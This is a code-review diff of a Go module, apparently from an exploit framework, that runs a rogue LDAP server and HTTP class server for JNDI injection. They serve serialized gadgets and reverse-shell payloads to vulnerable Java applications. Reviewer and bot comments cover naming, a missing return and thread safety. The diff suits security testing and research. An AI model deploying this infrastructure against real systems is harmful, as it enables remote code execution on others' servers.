38 changes: 19 additions & 19 deletions java/ldapjndi/ldapjndi.go
Expand Up @@ -41,13 +41,13 @@ const (
)

// a dirty way to pass the user's desired gadget to `handleBind`.
var globalSerializedPayload string
var GlobalSerializedPayload string

Do we want the exported names to be Global*? Maybe we should name them something payload oriented?


// a dirty way to pass the user's desired name to `handleBind`.
var globalName string
var GlobalName string

// if the class is loaded from a secondary http server, this will be set.
var globalHTTPServer string
var GlobalHTTPServer string

// automatically accept.
func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
Expand All @@ -59,29 +59,29 @@ func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
// Accept the incoming request. Verify it is asking for the correct endpoint
// and then send the user's requested gadget'.
func handleSearch(writer ldap.ResponseWriter, msg *ldap.Message) {
if len(globalSerializedPayload) == 0 {
if len(GlobalSerializedPayload) == 0 {
output.PrintFrameworkError("A serialized payload was never configured!")
}

req := msg.GetSearchRequest()
dname := string(req.BaseObject())

if dname != globalName {
output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, globalName)
if dname != GlobalName {
output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, GlobalName)

return
}

// send search result
res := ldap.NewSearchResultEntry(dname)
if strings.HasPrefix(globalSerializedPayload, "\xca\xfe\xba\xbe") {
if strings.HasPrefix(GlobalSerializedPayload, "\xca\xfe\xba\xbe") {
res.AddAttribute("javaClassName", "foo")
res.AddAttribute("javaCodeBase", message.AttributeValue(globalHTTPServer))
res.AddAttribute("javaCodeBase", message.AttributeValue(GlobalHTTPServer))
res.AddAttribute("objectClass", "javaNamingReference")
res.AddAttribute("javaFactory", message.AttributeValue(globalName))
res.AddAttribute("javaFactory", message.AttributeValue(GlobalName))
} else {
res.AddAttribute("javaClassName", "java.lang.String")
res.AddAttribute("javaSerializedData", message.AttributeValue(globalSerializedPayload))
res.AddAttribute("javaSerializedData", message.AttributeValue(GlobalSerializedPayload))
}
writer.Write(res)

Expand All @@ -106,21 +106,21 @@ func CreateLDAPServer(name string) *ldap.Server {
server.Handle(routes)

// set a name so that we aren't tossing exploits at just anyone
globalName = name
GlobalName = name

return server
}

func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, command string) {
switch gadget {
case TomcatNashornReverseShell:
globalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
GlobalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
case TomcatGenericBash:
globalSerializedPayload = createTomcatGenericGadget(command)
GlobalSerializedPayload = createTomcatGenericGadget(command)
case GroovyGenericBash:
globalSerializedPayload = createGroovyGenericBash(command)
GlobalSerializedPayload = createGroovyGenericBash(command)
case BeanUtils194GenericBash:
globalSerializedPayload = createBeanUtils194GenericBash(command)
GlobalSerializedPayload = createBeanUtils194GenericBash(command)
case HTTPReverseShell:
fallthrough
default:
Expand All @@ -131,7 +131,7 @@ func SetLDAPGadget(gadget GadgetName, binary string, lhost string, lport int, co
func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost string, httpPort int) {
switch gadget {
case HTTPReverseShell:
globalSerializedPayload = createHTTPReverseShell(lhost, lport, globalName)
GlobalSerializedPayload = createHTTPReverseShell(lhost, lport, GlobalName)
case TomcatNashornReverseShell:
fallthrough
case TomcatGenericBash:
Expand All @@ -146,9 +146,9 @@ func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost strin
return
}

globalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
http.HandleFunc("/"+globalName+".class", func(w http.ResponseWriter, _ *http.Request) {
fmt.Fprint(w, globalSerializedPayload)
GlobalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
http.HandleFunc("/"+GlobalName+".class", func(w http.ResponseWriter, _ *http.Request) {
fmt.Fprint(w, GlobalSerializedPayload)
})

output.PrintfFrameworkStatus("Starting HTTP Server on %s:%d", httpHost, httpPort)
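Review bot: Exporting `GlobalSerializedPayload`, `GlobalName` and `GlobalHTTPServer` in the first hunk lets any importing package assign them directly and skip `SetLDAPGadget`/`CreateLDAPServer`, which is where the `GlobalName` gate that `handleSearch` relies on is established; if the rename exists to serve an external caller, an exported setter that goes through the same path would keep that check meaningful. The comments on the newly exported variables still read `// a dirty way to pass ...`, whereas Go doc convention for exported names would want something like `// GlobalSerializedPayload holds the serialized gadget that handleSearch returns to a matching request.` with equivalent sentences for the other two. Separately, in `handleSearch` the `len(GlobalSerializedPayload) == 0` branch prints an error but does not return, so unless `output.PrintFrameworkError` terminates the process the handler continues and answers with an empty `javaSerializedData`; adding `return` after the print closes that. These variables are written by the setters and read from the LDAP and HTTP handlers with no synchronization visible here, which predates this change but is worth documenting now that they are part of the package's API.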